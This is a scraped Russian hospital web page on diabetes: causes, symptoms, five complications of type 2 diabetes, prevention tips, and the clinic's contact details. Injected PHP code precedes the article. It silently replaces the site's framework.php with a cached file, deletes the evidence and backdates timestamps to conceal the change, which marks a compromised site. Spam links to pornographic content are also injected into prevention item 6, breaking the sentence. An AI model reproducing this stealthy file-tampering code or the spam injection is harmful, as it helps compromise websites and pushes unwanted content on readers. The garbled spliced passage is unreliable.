$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Сахарный диабет и его профилактика

Последние новости

Сахарный диабет и его профилактика

PDF Печать E-mail

Сахарный диабет и его профилактика.

Сахарный диабет занимает третье место в мире среди причин заболеваемости и смертности  после сердечнососудистых и онкологических заболеваний.

Сахарный диабет представляет собой заболевание эндокринной системы, которое характеризуется превышением допустимой нормы сахара в крови, а это возникает из-за недостаточного количества инсулина или же в организме произошли изменения.

Инсулин — гормон поджелудочной железы, он поддерживает нормальный обмен веществ: углеродов, белков и непосредственно жиров.

Наиболее важным углеродом в организме человека является именно глюкоза. Она играет серьезную роль во всем обмене веществ – это буквально единственный источник энергии, который так необходим для организма человека.

Но чтобы перерабатывать весь объем глюкозы, который поступает в организм человека, нужно достаточно инсулина. Если его недостаточно, тогда развивается первый тип болезни, а вот вторым типом считается изменение действия инсулина на весь организм в целом.

В таком случае в крови скапливается большое количество глюкозы – такое состояние еще называется гипергликемией, а весь организм остается без запаса энергии, которая является основой для нормальной жизнедеятельности человека.

Причины, которые влекут за собой возникновение диабета:

ü  Наследственность.

ü  Ожирение.

ü  Заболевания поджелудочной железы.

ü  Вирусные инфекции.

ü  Нервный стресс.

ü  Сидячий образ жизни.

ü  Неправильное питание.

Симптомами сахарного диабета являются:

·            постоянная сильная жажда;

·            частые мочеиспускания;

·            обезвоживание организма;

·            сильное чувство голода;

·            истощение;

·            нарушение зрения;

·            мышечная слабость;

·            зуд и раздражения кожи.

Осложнения у больных сахарным диабетом 2 типа

При отсутствии должного лечения сахарный диабет приводит к развитию тяжелых осложнений. Нередко, (особенно в случае диабета 2 типа) появление осложнений является первым проявлением диабета у пациентов прежде ничего не знавших о своей болезни

Пять распространенных осложнений у больных сахарным диабетом второго типа:

1.      Диабетическая нефропатия комплексное поражение почек (артерий, клубочков, канальцев, артериол). Возникает из-за воздействия на почки продуктов нарушенного обмена липидов и углеводов, образующихся при сахарном диабете. Распространенность нефропатии у лиц с сахарным диабетом достигает 75%.

При остановке работы почек человек умирает в движении. Почки – это очистительная станция нашего организма. При их отказе или неудовлетворительной работе необходимо прибегать к искусственной очистке крови – гемодиализ. В результате этого человек становится зависимым от особого аппарата. Гемодиализ – сложная и очень дорогая операция, требующая достаточных финансовых затрат и постоянного нахождения человека в больнице.

2.     Поражение глаз при сахарном диабете, диабетическая ретинопатия. Поражение сетчатки глаза, которое затем приводит к кровоизлиянию в глазном дне, отслоению сетчатки. Постепенно приводит к полной потере зрения. Наиболее часто ретинопатия встречается у больных 2-м типом диабета. Для больного со «стажем» свыше 20 лет риск возникновения ретинопатии приближается к 100%.

 

3.     Диабетическая нейропатия – поражение периферических нервов у больных сахарным диабетом. Является очень частым осложнением заболевания. В процесс поражения могут вовлекаться самые разные отделы нервной системы. Нейропатия является одним из важнейших факторов развития «диабетической стопы», которая может привести к ампутации ноги.

 

4.     Диабетическая стопа. Сниженная нервная чувствительность способствует повышенной травматизации стоп (пациенты не чувствуют боли), поэтому таким больным нельзя ходить босиком, а уход за ногами должен быть крайне осторожным и аккуратным. При диабете любые раны заживают медленнее и чаще нагнаиваются. Язвы и плохое кровоснабжение могут привести к ампутации стоп.

 

5.     Поражение сердечно-сосудистой системы — осложнения сахарного  диабета.

Очень часто осложнением сахарного диабета является поражение сердечно-сосудистой системы, а именно появление ишемической болезни сердца, артериальной гипертонии и других осложнений, что может привести к развитию инсульта, инфаркта. Больным диабетом, в особенности людям пожилого возраста, необходимо тщательное наблюдение за артериальным давлением, а также показаниями жирового обмена.

Профилактика

Даже если вы или ваши близкие попадаете в группу риска по одной из приведенных выше причин, это не повод отчаиваться. Современные методы профилактики сахарного диабета позволят вести нормальный образ жизни — и при этом существенно снизить риск развития этого опасного заболевания.

Итак, главными методами профилактики диабета являются:

1.               Правильное питание.  Отказаться от высококалорийной еды.

Те, кто употребляет высококалорийную пищу, семимильными шагами идут навстречу к сахарному диабету 2 типа. Если организм не успевает за день израсходовать все наеденные калории, в итоге их избыток отражается на весе тела. Следует избегать высококалорийных продуктов, легкоусвояемых жиров и углеводов. В магазине нужно отдавать предпочтение продуктам с низким гликемическим индексом. В меню должно быть достаточное количество клетчатки, для этого необходимо ежедневно есть овощи, бобовые, цельнозерновой хлеб, фрукты с низким содержанием сахара. Ежедневно нужно съедать не менее 1 порции таких продуктов – это отличное дополнение к профилактике сахарного диабета 2 типа.

Нужно пожизненно, а не временно, научиться жить на 2 000 калорий при малоподвижном образе жизни и на 2500-3000 при регулярных занятиях спортом.

2. Ежедневные физические нагрузки. Начать двигаться.

Диабет – прямое следствие избыточного веса. Нужно научиться вести подвижный образ жизни, снижая массу тела и не позволяя ей переходить пределы нормы. В идеале, нужно ежедневно не менее 30 минут заниматься физической активностью – фитнесом, йогой, кардиотренировками. Рекомендуется повысить общую активность, например, заменить лифт лестницей, выходить из транспорта по дороге домой или на работу на 1 остановку раньше. Если вес тела уже превышен, нужно разработать программу с тренером по его снижению.

 3.  Пить воду.

Нашему организму необходимо постоянное восполнение водных запасов Вода является условием качественного обмена веществ, переработки пищи и функционирования жизнеобеспечивающих систем человека. Нужно приучиться пить чистую воду. Чай, кофе и соки в счет не идут, их организм рассматривает как еду. Необходимо выпивать стакан воды натощак утром и затем перед каждым приемом пищи.

4. Сохранять душевное равновесие.  Быть спокойной.

Нервное перенапряжение вызывает повышение гормонов и уровня глюкозы в крови. Систематические переживания могут спровоцировать появление сахарного диабета. Чтобы избежать заболевания нужно научиться контролировать свои эмоции, не нервничать и не испытывать стресс, возможно, для этого понадобиться пересмотреть взгляды на некоторые жизненные ситуации и находить позитив в любой ситуации.

5.  Следить за холестерином.

Повышение холестерина влечет за собой много неприятных последствий, в том числе способствует развитию диабета. Норма холестерина в крови растет с возрастом, так для девушки 20-30 лет – это от 3, 1 до 5, 1 ммоль/л, а в 50 лет – от 4 до 7,3. Холестерин приводит к появлению атеросклероза, инсультов, поэтому нужно регулярно следить за этим показателем, сдавая общий анализ крови хотя бы раз в квартал.

 

6.Регулярно naked celebrities
celebrity sex tapes
celebrity porn
celebrity sextapes
free celeb sextapes
milf pussy
Shemale Porn
toon porn
hentai porn
 проходить медицинские обследования
.

Для людей, состоящих в группе риска, профилактика диабета обязательно включает сдачу анализов как минимум раз в полгода.

Осведомлен — значит, вооружен!

 

Снизить риск заболевания сахарным диабетом поможет коррекция образа жизни и выработка полезных привычек. Это не происходит в один день, но здоровый образ жизни постепенно снижает риск заболевания и увеличивает продолжительность продуктивности человека.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Наши контакты

423812, РТ, г. Набережные Челны,Московский пр-кт, д.85
Телефоны:

Гл.врач - 58-53-55

Приемная гл. врача - 58-54-78

Справочная - 58-54-94

Приемное отделение - 58-52-02

Отделение платных услуг - 58-50-36

Горячая линия - 58-54-78

Группа VK  vk.com/infbol_nch

Факс: 58-54-78

E-mail:  infbol@mail.ru   mz.nchelny_ib@tatar.ru

  • Баннер
  • Баннер